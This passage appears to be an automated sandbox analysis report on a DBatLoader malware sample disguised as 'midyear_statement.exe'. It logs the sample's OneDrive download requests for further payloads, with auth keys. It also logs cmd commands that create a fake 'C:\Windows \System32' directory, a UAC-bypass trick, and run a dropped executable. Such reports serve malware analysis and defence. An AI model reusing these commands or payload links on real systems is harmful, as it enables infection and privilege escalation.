                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://aborlw.sn.files.1drv.com/y4mdIO5pciNH8fpwGOAAIADTo3pXjwRKPU-X6-J-zpDME1cfDB5-C-zJvJ0Zyx9NPNNsdX6VOMyHwKbWaiIcap2Zgvt0uEfbx1VtmbUV1pB4yROzM_enZjht50aHzMBFtXCcWKHbMiwUGRfkRpdYxkAdC7XyjDLJbd83GrL0fQFPvBMuibzaxQkijEzE2XaLliOxjjg7vASLv3lpX-FD_3i6w/255_Dhuirrkwdxq%201?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:c97c1iZP3Ig=:KLjk01uvYiAW3lg36GDtxOfDLv/EkgdaPaIfYhsFi6w=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=88a0d70f-7ea3-440e-b0b4-1db931472409&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:01 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:01 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 55f6fc7498-f4zdb
                                                                                                                                                                                        X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: F4E562D52FFB4BED8CFB4CD8B8D404EC Ref B: BN3EDGE0510 Ref C: 2024-03-28T12:59:01Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:01 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        2192.168.2.74970613.107.139.114436428C:\Users\user\Desktop\midyear_statement.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-03-28 12:59:03 UTC213OUTGET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
                                                                                                                                                                                        2024-03-28 12:59:03 UTC1181INHTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://abpoxw.sn.files.1drv.com/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1yWLZHBWtBLkNk7XrRTzZ1dmyUa0J__sLMIgAkVBZSn4LDSXDO0LsN9LnFsWe4K460IH2mRjrZAFM_P4UsnPwfW5_4UCDL4q61Ho8nzTRpE98lSCzh5879l2RhLQJ5TGUl9U57UBHgXMfa4meMhik09jbblg/255_Dhuirrkwdxq%202?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:wSUP2CZP3Ig=:vb8UYGBQ1ELQn1t2XVzdh1QzbSg1K0KAcz4YY414YGs=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=c255408b-155b-4eb2-ab9a-4c6bb40d53de&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:03 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:03 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 68d84894c4-wh8lp
                                                                                                                                                                                        X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 14A3944AA3794427A37A8D3A53B995BC Ref B: BN3EDGE0220 Ref C: 2024-03-28T12:59:03Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:02 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        3192.168.2.74971913.107.139.114437544C:\Users\Public\Libraries\Dhuirrkw.PIF
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-03-28 12:59:28 UTC213OUTGET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
                                                                                                                                                                                        2024-03-28 12:59:29 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://abqscw.sn.files.1drv.com/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX-g6MyBI4YNcvIdwxkWglTN1N8CY4cxMJjknOhla1QafWxdqZ0hdkCEBtgXH54x0vLiXgOU1cS8YybPN2dzFDtnkBcobZ8Mr4mXJ2zQSpmuWvSvzOBuuqnuX-boMZkf9QkzPjh8t6Uaxsr_nGRHX0lZhPqg/255_Dhuirrkwdxq?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:IvE75yZP3Ig=:ThfCUuC1YIDpZNfrsquojGN6S2Stvds78s23vJ/gOKE=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=1a408388-8313-4f6c-aaa0-4719760cf4d1&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:28 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:28 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 55f6fc7498-q87sk
                                                                                                                                                                                        X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: CBCD08A13CC84363BD9FF580C6CA167E Ref B: BN3EDGE0510 Ref C: 2024-03-28T12:59:28Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:28 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        4192.168.2.74972213.107.139.114437544C:\Users\Public\Libraries\Dhuirrkw.PIF
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-03-28 12:59:30 UTC213OUTGET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
                                                                                                                                                                                        2024-03-28 12:59:31 UTC1181INHTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://aborlw.sn.files.1drv.com/y4mLOg16uNX2Id3t-nfFLVYL7CZhAgTRemSr1q_NX-Mvx_fpOOS9Dz7js9NACEXeYp59yyMOCGdVrkXC8udJaIfz1H8nMhuWKfjagQZcuRGJ1Yb2wZYOWm-d88Hj_uRkwI3lAFpIlsA6h_9dXusozCqeRmVf4a3Hwg5IawezbeHlk8-sROiCd2d-2kiTRt_8XOO7uHQvVZ9HJhyRGGqt6cSAQ/255_Dhuirrkwdxq%201?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:XcGH6CZP3Ig=:J+IBFRK6UnhhGtrRUuqbJqct6Wvktu8EbgJa+BsUHj0=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=36ad82bc-3bb3-4086-b7f9-f2ae1c694351&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:30 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:30 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 55f6fc7498-2tq7v
                                                                                                                                                                                        X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 87308BB7CB564EE4A4CB452E3A67C19F Ref B: BN3EDGE0316 Ref C: 2024-03-28T12:59:30Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:30 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        5192.168.2.74972513.107.139.114437544C:\Users\Public\Libraries\Dhuirrkw.PIF
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-03-28 12:59:33 UTC213OUTGET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
                                                                                                                                                                                        2024-03-28 12:59:33 UTC1181INHTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://abpoxw.sn.files.1drv.com/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJVsre75q-4v7SmhYlN4A28B7KTl_rsn_2Lb3l-IDJqY5bFudSe6ievn2XKMWWC8nrTi87i_cWOZzaBVu8lopLINETsI8XBCOuTIh1fXiRIGwic84eljalzk2hNvMzSd-gT9ELswKW3qqa16VYDqaJQ74DXg/255_Dhuirrkwdxq%202?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:DdA16iZP3Ig=:MQeKXEAruxUQWUVP5NEtwVLsZ3m9F4XpUqzbGVTt22k=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=66290227-7913-4e0f-a824-70a6e650a56f&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:33 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:33 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 68d84894c4-m6nm6
                                                                                                                                                                                        X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: A1D672B7BFF645DBA7D256096AA60C25 Ref B: BN3EDGE0614 Ref C: 2024-03-28T12:59:33Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:33 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        6192.168.2.74972813.107.139.114436044C:\Users\Public\Libraries\Dhuirrkw.PIF
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-03-28 12:59:36 UTC213OUTGET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
                                                                                                                                                                                        2024-03-28 12:59:37 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://abqscw.sn.files.1drv.com/y4mqqfuxAaojOBVtfPX5lO_9YqS1UQ6NBRcPNPOJVv4XmHDm5_Gtl5qEf2kPgFewLT240WuRsCJqcOu-h0nRwQFIp7UER0szhBtwvKsPipxIfChcBqJywL1ZRKUsPYmNaLuKmgdg7zlXv5cgYZq6sDmAZgaQYE5t3kZcTS2XQRJfulwJKDHOfFKOny-KSfQqjOVIZ9EE3CJmIjLK0zYnMEaAg/255_Dhuirrkwdxq?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:uns47CZP3Ig=:Z8BRn7ndpvBpO9tcKrL/iCIpv/rLTAc9ZRrG4u9Bd18=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=9a1936c4-a5fb-46e2-88d1-88e3d96fc290&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:37 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:37 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 55f6fc7498-fgnbx
                                                                                                                                                                                        X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 995624025D12431CB68FFC2F4520C76E Ref B: BN3EDGE0413 Ref C: 2024-03-28T12:59:37Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:37 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        7192.168.2.74973113.107.139.114436044C:\Users\Public\Libraries\Dhuirrkw.PIF
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-03-28 12:59:38 UTC213OUTGET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
                                                                                                                                                                                        2024-03-28 12:59:39 UTC1181INHTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://aborlw.sn.files.1drv.com/y4mXBt2sSJKJZHlLzI8sH3PFmgRqsPoY_FaTasOJSi4WNTk8bd6AgZ1TzwzQWZ2uDijWJTMVWvNk7B4Qv7G4iDBRq9erQEykxjiVo_KqdGj_ppHb_qVh4I4GTgl18qcnNpGyLCxpBouyROeAZkKOj5A8RqqgS2RKBVz3MwCVm-LlkuyAon09hV4z9mBijNgqmLPO3Qimh3B2Ja3lF4RGaoYcA/255_Dhuirrkwdxq%201?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:JyVb7SZP3Ig=:WLjNeVwJXi5er2wsqTcDiuImJWEQim5M3M7HF5/xCz8=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=ef4af2f9-08c5-4fdf-bcbe-7a9461666dbb&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:38 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:39 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 55f6fc7498-smmtm
                                                                                                                                                                                        X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: B391C3E90CB54B5FB528CB3D61123954 Ref B: BN3EDGE0911 Ref C: 2024-03-28T12:59:38Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:38 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        8192.168.2.74973413.107.139.114436044C:\Users\Public\Libraries\Dhuirrkw.PIF
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-03-28 12:59:40 UTC213OUTGET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
                                                                                                                                                                                        2024-03-28 12:59:41 UTC1181INHTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://abpoxw.sn.files.1drv.com/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6cd0KwWqzDYPredBI5vJzq086sSkmP708M63WpYEpwq4Yb4UOciCaZK99NZv3Glv0RdkNg_bt9lvj4D3Yez3DFE6yjM5TlcLOyWpdO5eKA7S5G9HP8JxZkNdZIqLRpjs3yvx7DKG7OJWse6GZve05jg-ma6g/255_Dhuirrkwdxq%202?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:tYB+7iZP3Ig=:jpn+rMAexaaFH8vGoJZPZiSkdfipQz36GNFl7j3Hp/E=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=8c9cc4ae-19e8-4d2d-a83f-44208391d04b&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:40 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:41 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 68d84894c4-t9fd4
                                                                                                                                                                                        X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 07DC7F13EE3F45A0A94A6FC624985DDE Ref B: BN3EDGE0607 Ref C: 2024-03-28T12:59:40Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:40 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:13:58:56
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\user\Desktop\midyear_statement.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\midyear_statement.exe"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:1'265'664 bytes
                                                                                                                                                                                        MD5 hash:DD8E3F6AC5C24960B3A69490082C60E1
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1365940643.0000000002A46000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1364633992.0000000002656000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                        Start time:13:59:04
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:cmd /c mkdir "\\?\C:\Windows "
                                                                                                                                                                                        Imagebase:0x410000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                        Start time:13:59:04
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:cmd /c mkdir "\\?\C:\Windows \System32"
                                                                                                                                                                                        Imagebase:0x410000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:13:59:04
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:13:59:04
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:13:59:04
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                        Start time:13:59:07
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:cmd /c "C:\Windows \System32\2506803.exe"
                                                                                                                                                                                        Imagebase:0x410000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                        Start time:13:59:07
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                        Start time:13:59:07
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows \System32\2506803.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows \System32\2506803.exe"
                                                                                                                                                                                        Imagebase:0x7ff790070000
                                                                                                                                                                                        File size:131'648 bytes
                                                                                                                                                                                        MD5 hash:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                        Start time:13:59:07
